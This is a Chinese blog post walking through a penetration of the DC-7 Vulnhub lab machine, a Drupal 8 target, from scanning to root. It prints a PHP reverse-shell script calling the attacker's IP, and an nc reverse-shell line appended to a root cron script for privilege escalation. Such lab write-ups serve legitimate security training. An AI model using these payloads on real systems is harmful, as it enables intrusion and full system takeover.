DC-7靶机渗透

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量217 收藏
点赞数
分类专栏: 渗透从入门到入土 文章标签: web安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45349299/article/details/129005884
版权

title: DC-7靶机渗透
date: 2023-1-5 22 :53 :36
tags: DC系列靶机
categories: 渗透从入门到入土
author:Abyssaler

DC-7靶机渗透全流程

一:实验环境

kali攻击机: 192.168.2.103

DC-7靶机: 192.168.2.105

二:信息收集

主机发现

arp-scan -l

image-20230105225815326

端口扫描

1.masscan快速扫描端口

masscan --rate=10000 --ports 0-65535 192.168.2.105

image-20230105230153971

发现80,22端口

2.nmap精确扫描端口

nmap -p22,80 -sV -A 192.168.2.105

image-20230105230437660

已经发现cms是drupal 8

web信息收集

1.访问192.168.2.105

收集页面信息

cms: Drupal 8

image-20230105231206954

目录扫描

dirb http://192.168.2.105

image-20230106003353101

利用社工获取网页源码

注意到网页底部有个足迹

image-20230105233027227

尝试利用搜索引擎搜索他一下

image-20230105233527183

可以看到这个作者的GitHub账号了,点进去看看

image-20230105233648827

继续点进这个项目看看,可以看到这就是提示了

image-20230105233728950

那这些就是网站源码了

image-20230105233849493

可以直接下载下来进行审计分析

三:渗透测试

信息获取

将之前下载下来的网页源码解压

image-20230105234616462

查看config.php文件

cat config.php

得到了数据库的账号密码

image-20230105234807232

远程连接主机

既然有了账号和密码,有没有可能之前扫描出来的22端口也能用呢]\

尝试远程连接

ssh dc7user@192.168.2.105

image-20230105235247744

连接成功

修改admin密码

先进行一下系统的信息收集

可以看到权限挺低的

image-20230105235956015

crontab -l查看计划任务,mail查看邮件

image-20230106001605942

Cron Daemon不太清楚意思,查询试试

image-20230106001907924

那这里的意思大概就是root用户周期性的运行了一个系统任务,脚本的位置在/opt/scripts/backups.sh

image-20230106002341929

查看邮件后得知这个系统任务的大概意思是为数据库做一个备份,还给出了备份的位置

image-20230106002131880

查看下脚本的权限ls -l,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。

但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那我们可以获得了root权限的shell了。

image-20230106002735852

注意到脚本里有一个drush命令

image-20230106002432811

可以看到命令是进入 cd /var/www/html/ 后执行drush。

然后去百度看看 drush是干什么呢?

Drush(Drush = Drupal + Shell)就是使用命令行命令来操作Drupal站点,它的命令格式与git类似,都是双字命令(drush + 实际的命令)。既然是命令行命令,也就可以使用其他脚本来实现相同的功能,比如编写shell脚本来实现相同的功能,也的确有不少人这样做过。但是,使用Drush要远优于编写自己的脚本,好处在于,一是可以利用Drush开发社区的力量,二是Drush的命令更加可靠,适用于更多变的环境。

https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell

这里有写一些drush基本语法。

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password=123456

image-20230106003204970

修改成功

获得www-data的shell

登录网站后台

image-20230106003516162

进入后台,找到能写shell的地方

extend中找到可以安装模块

image-20230106004011862

下载一个php模块

下载地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

直接安装

image-20230106004229509

image-20230106004241669

启用php模块

image-20230106004600359

image-20230106004538135

编辑文章

image-20230106004443226

此时可以看到,文章可以用php进行解析了

image-20230106004725783

写入一个 反弹shell脚本

<?php
$sock = fsockopen("192.168.2.103", "444");
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

image-20230106005028432

kali开启nc监听

nc -lvvp 444

image-20230106005119519

重新访问下主页

image-20230106005210465

反弹成功

image-20230106005243909

设置个交互式界面python -c "import pty;pty.spawn('/bin/bash')"

image-20230106005404424

可以看到,现在我们有向脚本里写入代码的权限了

image-20230106011534911

提权

之前知道了,/opt/scripts/backup.sh会以root权限周期性的运行

我们可以向backups.sh内写入反弹shell脚本,利用nc就可以完成

然后如果是正常环境的话就等这个脚本运行的时候就成功了

echo "nc -nv 192.168.2.103 4455 -e /bin/bash" >>backups.sh

image-20230106012850409

kali开启侦听

nc -nlvp 4455

image-20230106012318041

连接成功

image-20230106012956972

他这个默认十五分钟执行一次,等十五分钟就好啦

得到flag

image-20230106013109841

image-20230106013116753

Abyssaler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-7靶机详细渗透步骤
wwxxss
11-04 647
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
DC-7靶机渗透测试
读书 买花 长大
04-30 352
DC-7
DC-7靶场
最新发布
mlws1900的博客
03-27 854
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
靶机8 DC-7(过程超详细)
honest_gg的博客
09-26 1454
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC靶机系列:DC-7
Ays.Ie的博客
02-28 260
本篇文章为DC系列第7个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-7靶机
Flamingo1998的博客
07-17 127
DC-7靶机
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1045
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
DC-7靶机进行渗透测试
zll___的博客
03-24 249
DC-7靶机进行渗透测试
dc-7 靶机渗透学习
..
03-23 3817
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 125
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
DC-7靶机渗透详细流程
braty_的博客
02-07 1455
DC-7靶机渗透详细流程
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2429
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
渗透测试:DC-7靶机
Ciyaso的博客
08-23 256
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值